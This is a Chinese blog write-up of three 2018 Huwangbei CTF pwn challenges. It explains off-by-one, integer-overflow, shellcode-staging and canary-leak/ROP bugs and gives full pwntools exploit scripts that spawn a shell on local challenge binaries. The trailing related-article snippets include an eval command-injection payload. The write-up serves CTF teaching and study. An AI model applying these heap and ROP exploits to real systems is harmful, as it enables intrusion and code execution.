2018护网杯pwn

最新推荐文章于 2022-04-17 11:19:58 发布
最新推荐文章于 2022-04-17 11:19:58 发布
阅读量532 收藏 1
点赞数
分类专栏: pwn 文章标签: pwn off-by-one
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Maxmalloc/article/details/86417715
版权

task_shoppingCart

漏洞点
在这里插入图片描述

  1. 存在一个整数溢出漏洞,能够控制数组的下标指向任意位置。
  2. 存在一个off by one漏洞
    画出相应的数据结构
    在这里插入图片描述

method1——off-by-one

思路
1.先通过构造unsortbins,利用edit泄露arena+232地址,得到libcbase
2.通过off-by-one将bss_name_adr[0]指向input chunk中,然后通过构造payload,使bss_name_adr[0]指向__free_hook,然后edit将system覆盖__free_hook
exp

from pwn import *
from LibcSearcher import *
context.terminal=['gnome-terminal','-x','sh','-c']
context.log_level='debug'
elf=ELF('./task_shoppingCart')
p=process('./task_shoppingCart')
libc_name = '/lib/x86_64-linux-gnu/libc.so.6'
Libc = ELF(libc_name)
def DEBUG(instruction,i=0):
    if i!=1:
        pwnlib.gdb.attach(p,instruction)
    else:
        pwnlib.gdb.attach(p)

def get_money():
    p.sendlineafter('be a rich man!\n','1')
    p.sendlineafter('RMB or Dollar?\n','aaaaa')

def get_enough():
    p.sendlineafter('be a rich man!\n','3')

def add(size,name):
    p.sendlineafter('Now, buy buy buy!\n','1')
    p.sendlineafter('How long is your goods name?\n',str(size))
    p.sendafter('What is your goods name?\n',name)

def edit(index,name):
    p.sendlineafter('Now, buy buy buy!\n','3')
    p.sendlineafter('to modify?\n',str(index))
    recv=p.recvuntil(' to?\n',drop=True)[-6:]
    p.send(name)
    return recv

def free(index):
    p.sendlineafter('Now, buy buy buy!\n','2')
    p.sendlineafter('?\n',str(index))

for i in range(0x14):
    get_money()
get_enough()

add(0x90,'aaaa')
add(0x90,'/bin/sh\x00')
free(0)
add(0,'')
#instruction = ''
#DEBUG(instruction)
recv=edit(2,'aaaa').ljust(8,'\x00')
#################get_system#############################
print hex(u64(recv))
Libc.address = u64(recv)- 0x10 - 232 -Libc.symbols['__malloc_hook']
system2 = Libc.symbols['system']
print hex(system2)
#############################################
#instruction='x/32xg '+str(hex(system2))
index1=(-0x1&0xffffffffffffffff)
edit(index1,'b'*8)
index2=(((0x561161d69140-0x561161d691e0)/8)&0xffffffffffffffff)
payload = (str(index2)+'\n')
payload += '2\n'+'1\n'#free时需要输入的参数,必须在构造pyload时添加
payload =payload.ljust(0x1000-0x20,'a')
payload+=p64(Libc.symbols['__free_hook'])
p.sendlineafter('Now, buy buy buy!\n','3')
p.sendafter('to modify?\n',payload)
p.recvuntil(' to?\n')
p.send(p64(system2))
p.interactive()

method2——

在这里插入图片描述
利用这个指向自己的指针,可以泄露出基地址。
通过bss_name_adr构造bss_name,从而实现任意写
例如在0x55e69149d0a8写入0x55e69149d0a0,在0x55e69149d0a0写入目标地址,从而实现目标地址任意写。
在这里插入图片描述

from pwn import *
from LibcSearcher import *
context.terminal=['gnome-terminal','-x','sh','-c']
context.log_level='debug'
elf=ELF('./task_shoppingCart')
p=process('./task_shoppingCart')
libc_name = '/lib/x86_64-linux-gnu/libc.so.6'
libc = ELF(libc_name)
def DEBUG(instruction,i=0):
    if i!=1:
        pwnlib.gdb.attach(p,instruction)
    else:
        pwnlib.gdb.attach(p)

def get_money():
    p.sendlineafter('be a rich man!\n','1')
    p.sendlineafter('RMB or Dollar?\n','aaaaa')

def get_enough():
    p.sendlineafter('be a rich man!\n','3')

def add(size,name):
    p.sendlineafter('Now, buy buy buy!\n','1')
    p.sendlineafter('How long is your goods name?\n',str(size))
    p.sendafter('What is your goods name?\n',name)

def edit(index,name):
    p.sendlineafter('Now, buy buy buy!\n','3')
    p.sendlineafter('to modify?\n',str(index))
    p.recvuntil(' to?\n')
    p.send(name)


def free(index):
    p.sendlineafter('Now, buy buy buy!\n','2')
    p.sendlineafter('?\n',str(index))

for i in range(0x14):
    get_money()
get_enough()

add(0x90,'aaaa')
add(0x50,'/bin/sh\x00')
free(0)#加载free的libc值到got表中
p.sendlineafter('Now, buy buy buy!\n','3')
p.sendlineafter('to modify?\n',str((-47)&0xffffffffffffffff))
recv=(p.recvuntil(' to?\n',drop=True)[-6:]).ljust(8,'\x00')
aim = u64(recv)
p.send(p64(aim))

instruction =''

print hex(u64(recv))
#0x202000
#
elf.address=aim-0x202000-0x68

edit((-20)&0xffffffffffffffff,p64(elf.got['free']))
edit((-19)&0xffffffffffffffff,p64(elf.address+0x2020a0))
#DEBUG(instruction)
p.sendlineafter('Now, buy buy buy!\n','3')
p.sendlineafter('to modify?\n',str((-39)&0xffffffffffffffff))
recv=p.recvuntil(' to?\n',drop=True)[-6:].ljust(8,'\x00')#泄露free libc地址
free_libc=u64(recv)
libc.address=free_libc-libc.symbols['free']
p.send(p64(libc.symbols['system'])[:7])
free(1)
p.interactive()

six

先分析一下程序
在这里插入图片描述
取两个随机数,作为映射起始地址,一块用于存放shellcode,一块作为stack

  v3 = (void (__fastcall *)(__int64, char *))dest;
  memset(&s, 0, 8uLL);
  puts("Show Ne0 your shellcode:");
  read(0, &s, 6uLL);
  sub_B05((__int64)&s);                         // check
  v4 = strlen(src);             // inint_shellcode= 0x30
  memcpy(dest, src, v4);
  v5 = (char *)dest;
  v6 = strlen(src);              
  memcpy(&v5[v6], &s, 7uLL);  //inint_shellcode+input_shellcode to dest
  v3(qword_202098, &s);//execve dest
/*init_shellcode
seg000:0000000000000000                 mov     rsp, rdi
seg000:0000000000000003                 xor     rbp, rbp
seg000:0000000000000006                 xor     rax, rax
seg000:0000000000000009                 xor     rbx, rbx
seg000:000000000000000C                 xor     rcx, rcx
seg000:000000000000000F                 xor     rdx, rdx
seg000:0000000000000012                 xor     rdi, rdi
seg000:0000000000000015                 xor     rsi, rsi
seg000:0000000000000018                 xor     r8, r8
seg000:000000000000001B                 xor     r9, r9
seg000:000000000000001E                 xor     r10, r10
seg000:0000000000000021                 xor     r11, r11
seg000:0000000000000024                 xor     r12, r12
seg000:0000000000000027                 xor     r13, r13
seg000:000000000000002A                 xor     r14, r14
seg000:000000000000002D                 xor     r15, r15
*/

shellcode先将我们申请的第二块地址作为stack,然后清空通用寄存器。因为前面申请的两块地址的起始地址是随机数,存在stack在shellcode的低地址端附近的情况。
这个题里面只允许输入长度为6的shellcode,所以我们必须要再次输入,所以第一次输入的shellcode必须是0号系统调用——read。
,然后再次read将使得第二次shellcode存放至第一次shell code后面。
exp

from pwn import *
context.log_level='debug'
context.terminal=['gnome-terminal','-x','sh','-c']
context.binary='./six' #we need the x64 shellcode
p=process("./six")
elf=ELF('./six')

def DEBUG(instrction,i=0):
    if i==0:
        pwnlib.gdb.attach(p)
    else:
        pwnlib.gdb.attach(p,instrction)

instruction=''
p.recvuntil('Show Ne0 your shellcode:\n')
Read=asm('''
push rsp
pop rsi
mov edx,esi
syscall
''')
p.send(Read)
#DEBUG('',0)
#shellcode = 0x36,we only need the offset of mmap is 0xc00.
payload =asm(shellcraft.nop())*0xc36+asm(shellcraft.sh())
p.send(payload)
p.interactive()

不一定第一次就能行,十六分之一的几率,慢慢试吧骚年!

huwang

这道题坑很多!
关键在于666函数。

  1. 因为需要预测散列函数值,所以我们必须对散列函数的输入必须进行控制。
  2. snprinf 的返回值是欲写入字符数。所以我们才能在后面进行栈溢出

解法

  1. 写入文件时,会先清空文件,所以我们我们能够预测散列函数值。从而进入下面这个函数。然后就是基本的栈溢出了。
    在这里插入图片描述
  2. 通过输入name(size=25)来泄露处canary。为栈溢出做准备。
    在这里插入图片描述
    exp
from pwn import *
import md5
context.log_level='debug'
context.terminal=['gnome-terminal','-x','sh','-c']



def DEBUG(instruction,i=0):
    if i==0:
        pwnlib.gdb.attach(p)
    else:
        pwnlib.gdb.attach(p,instruction)

def add(size,content):
    p.sendlineafter('command>> \n',str(1))
    p.sendlineafter(':',str(size))
    p.sendlineafter(':',content)

def free(index):
    p.sendlineafter('command>> \n',str(2))
    p.sendlineafter(':',str(index))


instruction='''
b *0x401556
c
x/100xg $rbp-0x110
'''

##第一次清空/tmp/secret,从而使第二次能够预测出md5
for i in range(2):
    p=process('./huwang')
    elf=ELF('./huwang')
    libc=ELF('./libc.so.6')
    m = md5.new()
    m.update('\x00'*16)
    md5_zero =m.digest()
    p.sendlineafter('command>> \n',str(666))
    p.recvuntil('name\n')
    p.send('abe'.ljust(0x19,'a'))#leak canary
    p.recvuntil('secret?\n')
    p.sendline('y')
    if i==0:
        p.sendlineafter(':\n',str(-1&0xffffffff))#使加密足够多次,使其能够在未完全写入文件时关闭程序,关闭文件,从而达到清空文件的目的
        sleep(0.1)
        p.close()
    
    else:
        p.recvuntil('secret:\n')
        p.sendline(str(1))
        secret=md5_zero
        p.recvuntil('secret\n')
        p.send(secret)
        p.recvuntil('abe'.ljust(0x19,'a'))#24+1(覆盖canary的最低位'\x00')
        recv=p.recv(13)#接收当前栈帧的canary和rbp

        canary=u64('\x00'+(recv[:7]))
        stack =u64((recv[7:]).ljust(8,'\x00'))-0xa0
        print hex(canary),hex(stack)
        #DEBUG(instruction,1)        
        occupation='a'*0xff#因为snprinf返回值是欲写入字符数,所以这里要尽可能大,为后面栈溢出做铺垫
        p.recvuntil('occupation?\n')
        p.send(occupation)
        sleep(0.1)

        p.recvuntil('[Y/N]\n')
        sleep(0.1)
        p.sendline('Y')
        '''
        0x0000000000401573 : pop rdi ; ret
        0x000000000040156A : p_5
        '''
        pop_rdi = 0x0000000000401573#配合只有一个参数的的函数
        p_5=0x000000000040156A#这是万能执行函数rop chain——init
        payload='a'*0x108+p64(canary)+p64(stack)+p64(pop_rdi)+p64(elf.got['puts'])
        payload+=p64(elf.plt['puts'])
        payload+=p64(p_5)+p64(0)+p64(1)+p64(elf.got['read'])+p64(8*4)+p64(stack+19*8)+p64(0)+p64(0x0000000000401550)+'a'*8*7
        p.send(payload)
        puts=u64(p.recv()[-7:-1].ljust(8,'\x00'))
        libc.address=puts-libc.symbols['puts']
        system=libc.symbols['system']
        #print hex(puts)
        payload=p64(pop_rdi)+p64(stack+22*8)+p64(system)+'/bin/sh\x00'
        p.send(payload)
        p.interactive()


# import md5
# m = md5.new()
# m.update('\x00'*16)
# md5_zero =m.digest()
# z=''
# for i in md5_zero:
#     z+=str(hex(ord(i))[2:])
# print z

比较笨,rop的很生硬>.<

https://xz.aliyun.com/t/2897
https://blog.csdn.net/snowleopard_bin/article/details/83119665

Maxmalloc
关注
专栏目录
2018pwn题目task_gettingStart_ktQeERc的writeup
iqiqiya的博客
10-13 1288
下载后   本来想先用checksec 看看有啥保 但是却发现执行不了(这里不太明白) 看到做出的人那么多  也就没有顾虑了 载入IDA   看到关键字符串  且有/bin/sh     双击进入    发现连续三个跳转之后   就是最终结果 直接F5看伪代码    看到read()之后    这不就是栈溢出嘛  覆盖v7 v8的数据达到条件即可获得shell 栈中顺序...
杯REFINAL超详细WP
BadRer的博客
10-15 3805
前言 由于时间原因没有在比赛结束前提交flag,所以干脆写一个详细的解答过程(自认为),适合小白阅读,Pizza大佬请绕过。
[BUUCTF-pwn] 杯_2018_task_calendar
weixin_52640415的博客
01-18 378
劫持_IO_2_1_stdout_ 程序没有show,需要劫持_IO_2_1_stdout_ 程序有add,edit,free其中edit调用sub_B5F 会多读1个字符:off_by_one,由于有大小限制,通过这里释放得到unsortbin __int64 __fastcall readstr_1(__int64 a1, signed int a2) { char buf; // [rsp+13h] [rbp-Dh] BYREF unsigned int i; // [rsp+14h]
pwn题目gettingStart
keep coding
10-13 640
拖进IDA 通过main函数的代码显而易见 v7需要等于0x7FFFFFFFFFFFFFF以及v8需要等于0.1 通过buf进行覆盖即可 0.1在内存中的值为4591870180066957722 double a = 0.1; printf("%lld\n", *(long long*)&amp;a); //输出4591870180066957722 编写脚本 from ...
2018骇极杯[cyvm]
九层台
11-28 447
ida加载 一个switch case。套用大佬的一句话“while循环套switch,不是迷宫就是vm” 这里是vm,第一次做vm的题目。简单说一下vm是什么。 vm其实就是自己定义了一下程序的机器码,比如这里用0x01来表示mov这两个参数,然后用数组来模拟寄存器,栈。在这个题里面vm的数据段和代码放到了一起。 简单跟了一下 ennnn有点不太好懂,贴出官方的步骤 最后一位是原来的值,...
2018杯逆向题目
10-16
2018杯逆向题目是针对这一领域的专业挑战,旨在检验参赛者在逆向工程方面的技能和知识。这三道题目——task_Loader7.exe、task_APM233_6.exe和task_huwang-refinal-6.exe,很可能是精心设计的恶意软件或复杂程序...
2020全国工业互联安全技术技能大赛-杯-chinaiisc2020.zip
10-24
2020全国工业互联安全技术技能大赛,原来的杯,比赛的原题以及附件,供大家进行学习和交流。祝大家技术进步!
鼎杯writeup-先锋1
08-04
鼎杯writeup-先锋1】的知识点总结: 在络安全竞赛“鼎杯”中,参赛者需要解决一系列挑战,这些挑战涉及到多种安全技术,如代码泄露、漏洞利用、加壳破解、文件格式分析等。以下是各部分的具体知识点: ...
2020全国工业互联安全技术技能大赛-杯原题及附件-chinaiisc2020
01-11
2020全国工业互联安全技术技能大赛,原来的杯,比赛的原题以及附件,供大家进行学习和交流。祝大家技术进步!
各大厂商面试题汇总
最新发布
06-26
"各大厂商面试题汇总" 本资源汇总了各大厂商面试题,涵盖了大量的IT知识点,包括go语言免杀shellcode、Windows Defender防御机制、卡巴斯基进程保、Fastjson不出、内存Webshell命令执行、域内渗透、...
2018杯shoppingcart
snowleopard_bin的博客
10-17 362
from pwn import * #context.log_level='debug' cn = process('./task_shoppingCart') elf = ELF('./task_shoppingCart') libc = ELF('./libc-2.23.so') strtoul_got = p64(elf.got['strtoul']) def money(s): cn....
pwn题堆利用的一些姿势 -- malloc_hook
lifanxin的博客
04-12 4233
  在做堆题的时候,经常会遇到保全开的情况,其中对利用者影响最大的是PIE保和Full RELRO,NX保和栈保对堆利用来说影响都不大,一般利用也不会往这方面靠。开了PIE保的话代码段的地址会变,需要泄露代码段基地址才能利用存储在bss段上的堆指针;开了Full RELRO的话,则意味着我们无法修改got表,导致无法修改其它函数got表指向system,进一步获取到shell。因此也就有了我这一系列文章的目的,在got表无法被修改时,我们往往利用的就是下面的一些hook+one
pwn中堆利用的姿势收集仓(持续补充中,用到什么记录什么)
Assassin
04-17 578
文章目录一、malloc hook(一)初级利用(二)程序中有/bin/sh字符串的利用方法(三)更常见的情景,利用realloc函数调整栈结构(四)例题二、free hook 很好的参考资料: pwn题堆利用的一些姿势 – malloc_hook 一、malloc hook 使用malloc hook主要是应对保全开的时候,因为got表无法劫持,所以使用malloc hoook + onegadget来实现 (一)初级利用 malloc_hook是在malloc函数调用前会执行的钩子函数。 在程序中,
2018杯的pwn签到题(详细过程)
dengshanyi7201的博客
10-14 607
题目: 链接:https://pan.baidu.com/s/1WcO-y2MQ6Wb17PqL2dxyyA 提取码:z5a7 首先找保机制 难受 保全开!! 运行一下,发现只有一个输入点。 ida分析一波 发现只要满足 v7=0x7FFFFFFFFFFFFFFFLL 还有v8=0.1 但是在payload去传值需要用0x????,这里可以了...
ctf pwn 个人经验记录
jmp esp
05-22 8867
前言记录一下自己在做pwn的过程当中学到的一些东西,以前不知道的东西等等,碰到的坑也会记录在 这里,主要目的是帮助自己记录一下经验。其实每一道题基本上能学到的新东西是有限的,记录下来避免什么时候想不起来。顺序比较乱,基本上根据我做题的顺序定的,比较随意。pwnother place(not from ctf) 多用gdb调试,有思路可以先写出来调试一下看看效果再说 遇见pie考虑写malloc_h
[pwn]堆:realloc_hook控制栈结构达成onegadget
Breeze的博客
12-31 1万+
[pwn]realloc_hook控制栈结构达成onegadget 文章目录[pwn]realloc_hook控制栈结构达成onegadgetchunk extend通过realloc调整栈帧来满足onegadgeteasy_pwn wp chunk extend chunk extend是一种限制比较少的堆利用方式,通常通过off by one或off by null来利用。 chuank ex...
2019强杯 - 密码学-RSA-Coppersmith
热门推荐
BlusKing
05-28 1万+
Coppersmith 相关攻击 学习资料: https://ctf-wiki.github.io/ctf-wiki/crypto/asymmetric/rsa/rsa_coppersmith_attack/ https://code.felinae98.cn/ctf/crypto/rsa%E5%A4%A7%E7%A4%BC%E5%8C%85%EF%BC%88%E4%BA%8C%EF%BC%...
杯部分题目题解
0verWatch的博客
10-14 4276
前言 杯的这次比赛还是很有收获的,至少在web方面我认为是这样的,还是得继续努力吧。。。 正文 MISC 迟来的签到 AAoHAR1UIFBSJFFQU1AjUVEjVidWUVJVJVZUIyUnI18jVFNXVRs= 题目说要异或,那就直接爆破异或就好 写个小脚本就可以得到flag import base64 a = &quot;AAoHAR1UIFBSJFFQU1AjUVEjVidWUVJV...
杯2018 pwn复现
weixin_30588729的博客
08-03 418
前言 本文对强杯 中除了 2 个内核题以外的 6 个 pwn 题的利用方式进行记录。题目真心不错 程序和 exp: https://gitee.com/hac425/blog_data/blob/master/qwb2018/ 正文 silent 漏洞 在 free 的时候指针没有清空,而且程序没有 检测指针是否已经被释放 double free, 后面的 编辑功能也没有检验指针是否已经被 fr...
[杯 2018]easy_tornado
03-16
杯 2018 中的 easy_tornado 题目是一道Web安全题目。根据题目描述,该站使用了 Tornado 框架搭建,并且存在一个可以进行任意代码执行的漏洞。需要我们利用这个漏洞,在服务器上执行指定的命令。 解决这道题目的关键在于找到代码执行的漏洞点。在代码中,我们可以看到使用了 Python 的 eval() 函数,而这个函数可以执行任意的 Python 代码。我们可以通过构造一个恶意的字符串,然后将其传递给 eval() 函数,从而实现任意代码执行。 具体来说,我们可以构造一个 HTTP 请求,其中包含以下数据: { "action": "__import__('os').system('command')" } 其中 command 为需要执行的命令。这个数据会被传递到服务器端,并被 eval() 函数执行。由于没有对输入数据进行过滤,我们可以通过这个漏洞,在服务器上执行任意的命令。 需要注意的是,由于 Python 的语法比较严格,我们需要在构造恶意字符串时,确保其语法是正确的。可以使用 Python 的反斜杠(\)来转义引号和其他特殊字符,以确保字符串的语法是正确的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值